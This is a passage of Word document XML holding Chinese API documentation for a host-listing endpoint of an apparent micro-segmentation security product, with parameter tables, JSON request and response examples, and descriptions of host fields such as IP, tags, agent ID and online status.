            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EBEB21C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>查询数据类型，0:被访问者类型，1:访问者类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2C4BAACF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73BFDC09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22692E8C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="382B6C47" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74E5BB34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>分页的页数，默认0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="42241755" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DE496D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="757BDFE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C491EBF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C2D550A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>分页的大小，默认50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="07BF3FC7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D9FE247" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sorts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79B8CC27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="417CF8DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72642A7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>排序字段,多个用逗号隔开,sorts字段的约定不写表示升序，"-"表示降序</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4EFE6FA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120E9358" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"page": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>"size": 50,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "sorts":"ip",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"ip": "10",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"msSwitchStatus": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"strategyId": "629dbf65c56dd50d10c9a984",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"strategyHostType": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54374E7D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB021A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"data": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"total": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"rows": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"ip": "10.106.24.15",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"matchIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"hostname": "wgl15d",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"groupName": "l15a29a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"tags": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"id": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"tagName": "a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"tagColor": "#27C28E",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"osType": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"agentId": "628f270f5aa65ca9"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"msSwitchStatus": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"available": "yes",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"agentId": "628f270f5aa65ca9",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"status": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"osType": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"onlineStatus": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"filters": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"remark": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>},</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"success": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"errorCode": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"errorDesc": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1C807A"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708"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="4612"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4D5075B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379AAC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D9961B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4045B57E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="597FCFED" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22C0F09B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EDB3F33" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C148004" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0B0005C4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="175892F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>matchIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C0AB55E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01DCB45D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>匹配ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1C3DE933" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AE9E99A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AB388AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="748E902C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="53B801AC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E28197B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groupName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33662FE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72481E1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6F0FEC44" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5524F3BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05A73B62" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B9DC809" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1B1585F3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50E7D53A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68EBFAE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40050174" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7ECD80E3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23C087B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>onlineStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C22E8B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5246BD00" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>在线状态,0离线 1在线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="17CAC1A2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CD68724" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>msSwitchStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D0B4187" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73DD9C86" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>微隔离开关：0关闭 1开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="234B6F1A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58732E8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>available</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55CDDB18" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="555B1BEE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否可用，yes：可用，no：不可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="228F6976" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FF1F2AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FF742C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BC93F54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4CB786FE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72CD95BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53F5F3CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D973421" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>策略状态,0：新建，1：待同步，2：已同步,3:删除</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="521EA6AC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37C2902C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E21AFEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D668C3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作系统类型，1：linux， 2：windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="18DA00F0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CECFC42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>onlineStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A965FC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65E4E2B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>在线状态，0：离线，1：在线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E62C017" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HostTagVO</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1103"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3828"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="037CA50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D702872" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42CC5B15" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
